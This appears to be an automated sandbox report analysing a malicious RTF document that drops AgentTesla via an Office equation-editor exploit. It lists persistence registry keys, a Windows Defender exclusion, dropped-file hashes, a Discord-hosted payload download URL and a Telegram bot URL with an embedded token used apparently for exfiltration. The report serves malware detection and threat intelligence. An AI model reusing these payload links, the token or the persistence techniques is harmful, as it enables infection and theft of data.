                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exeQueries volume information: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\srt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

                      Yara detected AgentTesla
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: number of queries: 2505

                      Remote Access Functionality:

                      Yara detected AgentTesla

                      Mitre Att&ck Matrix

                      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                      Valid Accounts | Command and Scripting Interpreter 1 | Startup Items 1 | Startup Items 1 | Masquerading 221 | OS Credential Dumping | Security Software Discovery 11 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 12 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                      Default Accounts | Exploitation for Client Execution 13 | Registry Run Keys / Startup Folder 221 | Access Token Manipulation 1 | Disable or Modify Tools 11 | LSASS Memory | Process Discovery 1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                      Domain Accounts | At (Linux) | Logon Script (Windows) | Process Injection 111 | Virtualization/Sandbox Evasion 121 | Security Account Manager | Virtualization/Sandbox Evasion 121 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                      Local Accounts | At (Windows) | Logon Script (Mac) | Registry Run Keys / Startup Folder 221 | Access Token Manipulation 1 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 3 | SIM Card Swap | | Carrier Billing Fraud
                      Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Process Injection 111 | LSA Secrets | File and Directory Discovery 12 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                      Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 1 | Cached Domain Credentials | System Information Discovery 14 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
                      External Remote Services | Scheduled Task | Startup Items | Startup Items | Timestomp 1 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact

                      Behavior Graph

                      [Behavior graph image; the text recoverable from it follows.]
                      Behavior Graph ID: 425839; Sample: order-confirmation.doc__.rtf; Startdate: 27/05/2021; Architecture: WINDOWS; Score: 100
                      Signatures: Found malware configuration; Antivirus / Scanner detection for submitted sample; Sigma detected: Powershell adding suspicious path to exclusion list; 13 other signatures
                      Processes started at the top level: EQNEDT32.EXE; 69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe; svchost.exe; WINWORD.EXE
                      • EQNEDT32.EXE: DNS/IP: cdn.discordapp.com 162.159.130.233, 443, 49167, 49168 CLOUDFLARENETUS United States. Dropped: C:\Users\user\AppData\Roaming\srt.exe, PE32. Signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802). Started: srt.exe
                      • srt.exe: Dropped: C:\Windows\Resources\Themes\...\svchost.exe, PE32; 69vdz0d62eh81022f8...A2mdw7IdFa8a78d.exe, PE32. Signatures: Machine Learning detection for dropped file; Drops PE files to the startup folder; Creates an autostart registry key pointing to binary in C:\Windows; 3 other signatures. Started: 69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe; powershell.exe; powershell.exe; 7 other processes
                      • 69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe (started by srt.exe): Signatures: Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes. Started: powershell.exe; powershell.exe; powershell.exe; 2 other processes
                      • 69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe (top level): Signatures: Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes. Started: powershell.exe; powershell.exe; powershell.exe; powershell.exe
                      • svchost.exe: Signatures: Machine Learning detection for dropped file; Tries to delay execution (extensive OutputDebugStringW loop)


                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      Source | Detection | Scanner | Label | Link
                      order-confirmation.doc__.rtf | 40% | ReversingLabs | Document-RTF.Trojan.Heuristic |
                      order-confirmation.doc__.rtf | 100% | Avira | HEUR/Rtf.Malformed |
                      Dropped Files

                      Source | Detection | Scanner | Label | Link
                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe | 100% | Joe Sandbox ML | |
                      C:\Users\user\AppData\Roaming\srt.exe | 100% | Joe Sandbox ML | |
                      C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe | 100% | Joe Sandbox ML | |

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      Source | Detection | Scanner | Label | Link
                      http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe |
                      http://www.%s.comPA | 0% | URL Reputation | safe |
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe |
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | 0% | URL Reputation | safe |

                      Domains and IPs

                      Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
cdn.discordapp.com | 162.159.130.233 | true | false | | high

                        Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://cdn.discordapp.com/attachments/843685789120331799/847476783744811018/OtI.exe | false | | high

                          URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | srt.exe, 00000003.00000002.2190088879.00000000082C7000.00000002.00000001.sdmp, powershell.exe, 00000004.00000002.2103393408.0000000002D17000.00000002.00000001.sdmp, powershell.exe, 00000006.00000002.2110147497.0000000002CB7000.00000002.00000001.sdmp | false | | high
http://www.windows.com/pctv. | powershell.exe, 00000004.00000002.2102822983.0000000002B30000.00000002.00000001.sdmp | false | | high
http://investor.msn.com | srt.exe, 00000003.00000002.2187112009.00000000080E0000.00000002.00000001.sdmp, powershell.exe, 00000004.00000002.2102822983.0000000002B30000.00000002.00000001.sdmp | false | | high
http://www.msnbc.com/news/ticker.txt | srt.exe, 00000003.00000002.2187112009.00000000080E0000.00000002.00000001.sdmp, powershell.exe, 00000004.00000002.2102822983.0000000002B30000.00000002.00000001.sdmp | false | | high
http://www.icra.org/vocabulary/. | srt.exe, 00000003.00000002.2190088879.00000000082C7000.00000002.00000001.sdmp, powershell.exe, 00000004.00000002.2103393408.0000000002D17000.00000002.00000001.sdmp, powershell.exe, 00000006.00000002.2110147497.0000000002CB7000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | srt.exe, 00000003.00000002.2184970130.0000000007900000.00000002.00000001.sdmp, powershell.exe, 00000004.00000002.2100315678.00000000021A0000.00000002.00000001.sdmp | false | | high
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | powershell.exe, 00000004.00000003.2093705845.0000000000701000.00000004.00000001.sdmp, powershell.exe, 00000006.00000003.2095242575.00000000002DB000.00000004.00000001.sdmp | false | | high
https://api.telegram.org/bot1870790471:AAFpD5zuAlCeqAqJnBFTcvC5WkaPoWtoQ9c/ | srt.exe, 00000003.00000002.2179897228.00000000040F3000.00000004.00000001.sdmp | false | | high
http://investor.msn.com/ | srt.exe, 00000003.00000002.2187112009.00000000080E0000.00000002.00000001.sdmp, powershell.exe, 00000004.00000002.2102822983.0000000002B30000.00000002.00000001.sdmp | false | | high
http://www.piriform.com/ccleaner | powershell.exe, 00000004.00000003.2093705845.0000000000701000.00000004.00000001.sdmp, powershell.exe, 00000006.00000003.2095242575.00000000002DB000.00000004.00000001.sdmp | false | | high
http://www.%s.comPA | srt.exe, 00000003.00000002.2184970130.0000000007900000.00000002.00000001.sdmp, powershell.exe, 00000004.00000002.2100315678.00000000021A0000.00000002.00000001.sdmp | false | URL Reputation: safe | low
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | srt.exe, 00000003.00000002.2190088879.00000000082C7000.00000002.00000001.sdmp, powershell.exe, 00000004.00000002.2103393408.0000000002D17000.00000002.00000001.sdmp, powershell.exe, 00000006.00000002.2110147497.0000000002CB7000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.hotmail.com/oe | srt.exe, 00000003.00000002.2187112009.00000000080E0000.00000002.00000001.sdmp, powershell.exe, 00000004.00000002.2102822983.0000000002B30000.00000002.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | srt.exe, 00000003.00000002.2184172162.0000000006901000.00000004.00000001.sdmp | false | | high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | srt.exe, 00000003.00000002.2179897228.00000000040F3000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown

                                                Contacted IPs


                                                Public

IP | Domain | Country | ASN | ASN Name | Malicious
162.159.130.233 | cdn.discordapp.com | United States | 13335 | CLOUDFLARENETUS | false

                                                General Information

                                                Joe Sandbox Version:32.0.0 Black Diamond
                                                Analysis ID:425839
                                                Start date:27.05.2021
                                                Start time:21:41:34
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 18m 33s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Sample file name:order-confirmation.doc__.rtf
                                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                Number of analysed new started processes analysed:40
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal100.troj.adwa.expl.evad.winRTF@57/24@2/1
                                                EGA Information:Failed
                                                HDC Information:Failed
                                                HCA Information:
                                                • Successful, ratio: 98%
                                                • Number of executed functions: 922
                                                • Number of non-executed functions: 0
                                                Cookbook Comments:
                                                • Adjust boot time
                                                • Enable AMSI
                                                • Found application associated with file extension: .rtf
                                                • Found Word or Excel or PowerPoint or XPS Viewer
                                                • Attach to Office via COM
                                                • Scroll down
                                                • Close Viewer
                                                Warnings:
                                                • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                                • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                Simulations

                                                Behavior and APIs

Time | Type | Description
21:42:36 | API Interceptor | 28x Sleep call for process: EQNEDT32.EXE modified
21:42:39 | API Interceptor | 225x Sleep call for process: srt.exe modified
21:42:44 | API Interceptor | 277x Sleep call for process: powershell.exe modified
21:42:44 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe
21:42:48 | API Interceptor | 258x Sleep call for process: 69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe modified
21:42:58 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce 69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe
21:43:06 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce 69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe
21:43:12 | API Interceptor | 114x Sleep call for process: svchost.exe modified
21:43:34 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run qweruiuyt C:\Users\user\AppData\Local\Temp\qweruiuyt\qweruiuyt.exe
21:43:42 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run qweruiuyt C:\Users\user\AppData\Local\Temp\qweruiuyt\qweruiuyt.exe

                                                Joe Sandbox View / Context

                                                IPs


                                                Domains


                                                ASN


                                                JA3 Fingerprints


                                                Dropped Files

Match | Associated Sample Name / URL | Detection
C:\Users\user\AppData\Roaming\srt.exe | Order Confirmation.doc | malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe | Order Confirmation.doc | malicious
C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe | Order Confirmation.doc | malicious

                                                      Created / dropped Files

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8AE4C9C3-349E-46EF-BF24-C3A751787722}.tmp
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):1024
                                                      Entropy (8bit):0.05390218305374581
                                                      Encrypted:false
                                                      SSDEEP:3:ol3lYdn:4Wn
                                                      MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                      SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                      SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                      SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                      Malicious:false
                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{AB5F6AD7-3C7C-4823-93B4-8E22DB7DEE25}.tmp
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):1536
                                                      Entropy (8bit):1.9135740244905386
                                                      Encrypted:false
                                                      SSDEEP:12:qNjqawzFgC1693UlhaUIrKMCXIHvk5uFJizbuvq2ZA:qZnwzFqasUIPs50MzbunA
                                                      MD5:173BD29F37AF517A6E5FB84E32DFAADC
                                                      SHA1:47AD5540D17134DF10505ADC1D530EE922260575
                                                      SHA-256:793781237510EF04EB575C68615DF138D28E1954BF4246EF04335AE518C64D24
                                                      SHA-512:54135AD4AA7F4112A90D30F259A11B17DF7AD10B1C4F4AE1F0D8A48D43D5FA5FBA4BA52AECA502E2A7EA58A40FAC0FF6F6AE1CFBE345B4AE041FE2A89A4A0916
                                                      Malicious:false
                                                      Preview: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .7.4.0.8.0.9.2.3. . . . . . . . . . . . . . . . . . . . . . . . . ._. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .n.B.m.g.5.1.S.K.P.W.n.2.K.o.y.c.U.n.r.k.x._.m.Y.4.Y.g.U.d.w.U.J.f.a.b.A.k.W.N.I.H.R.L.O.F.9.h.D.M.J.x.X.N.V.t.H.d.V.p.s.v.k. . .1.8.0.3.3.4.2.6.5.1.8.0.3.3.4.2.6.5._.T.V.P.A.J.T.S.K.L.Y.E.F.p.h.q.l.s.h.a.h.h.l.d.j.b.l.o.f.y.d.n.e.k.a.l.t.q.r.r.r.j.h.u.y.e.k.b.m.r.m.g.W.K.L.Q.Q.Y.G.B.D.I.O.B.V.O.L.B.Y.0.6.3.3.0.6.6.1.6.1.6.8.9.8.3.9.4.5.2.8.9.6.8.0.7.0.6.4.8.2.9.=....... .E.q.u.a.t.i.o.n...3.E.M.B.E.D.................................................................................................................................................................................................................................................................................................................................................................................................
                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):112
                                                      Entropy (8bit):4.396946248094323
                                                      Encrypted:false
                                                      SSDEEP:3:HBjCL8IdrFoSmaCL8IdrFomxWBjCL8IdrFov:HBjE3YaE3yjE3y
                                                      MD5:80F98775AEC3A1D057B0E97BB92C6BA4
                                                      SHA1:A5628EC89AAD766D79CAD486639FA9D6C967DABB
                                                      SHA-256:86CBC2754A828A97C1E42C1D22601F1C375C2F13452838376A3B03F0AB65FD2F
                                                      SHA-512:4DBC0EA48E99F1486ED0052D0E586EA366B6A8A2E5D2E8EFA9E0DD2993A188824AE3D6DD783EF2CEFC655EF54864A27D63A31E1B915BCB931223B3BE03B00729
                                                      Malicious:false
                                                      Preview: [misc]..order-confirmation.doc__.LNK=0..order-confirmation.doc__.LNK=0..[misc]..order-confirmation.doc__.LNK=0..
                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\order-confirmation.doc__.LNK
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:16 2020, mtime=Wed Aug 26 14:08:16 2020, atime=Fri May 28 03:42:34 2021, length=5082, window=hide
                                                      Category:dropped
                                                      Size (bytes):2168
                                                      Entropy (8bit):4.572006912903714
                                                      Encrypted:false
                                                      SSDEEP:48:8ZKQ/XT0jF/Wr1qQh2ZKQ/XT0jF/Wr1qQ/:8//XojFOrAQh2//XojFOrAQ/
                                                      MD5:D792CA7FB33ABFEF36C43AEE6059311C
                                                      SHA1:7F07091E89F0C19FF7F32FD386858B2BA27583B7
                                                      SHA-256:FC6B467F21CCA100460352D0CC8B27F9A7AF8F1A0E1094A26E9221EA109CE586
                                                      SHA-512:9B52E9D772CB1015EBEF7AA891EF3C0382E09923CC37C560D32EE00C14EBED0E10BE4A1C76D23D8ECC77734CA3B3A9C24749FC00DFA9D09F8A4A2365D19C4BD3
                                                      Malicious:false
                                                      Preview: L..................F.... ....B{..{...B{..{.....{S...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2......RR% .ORDER-~1.RTF..f.......Q.y.Q.y*...8.....................o.r.d.e.r.-.c.o.n.f.i.r.m.a.t.i.o.n...d.o.c._._...r.t.f.......................-...8...[............?J......C:\Users\..#...................\\128757\Users.user\Desktop\order-confirmation.doc__.rtf.3.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.o.r.d.e.r.-.c.o.n.f.i.r.m.a.t.i.o.n...d.o.c._._...r.t.f.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......
                                                      C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
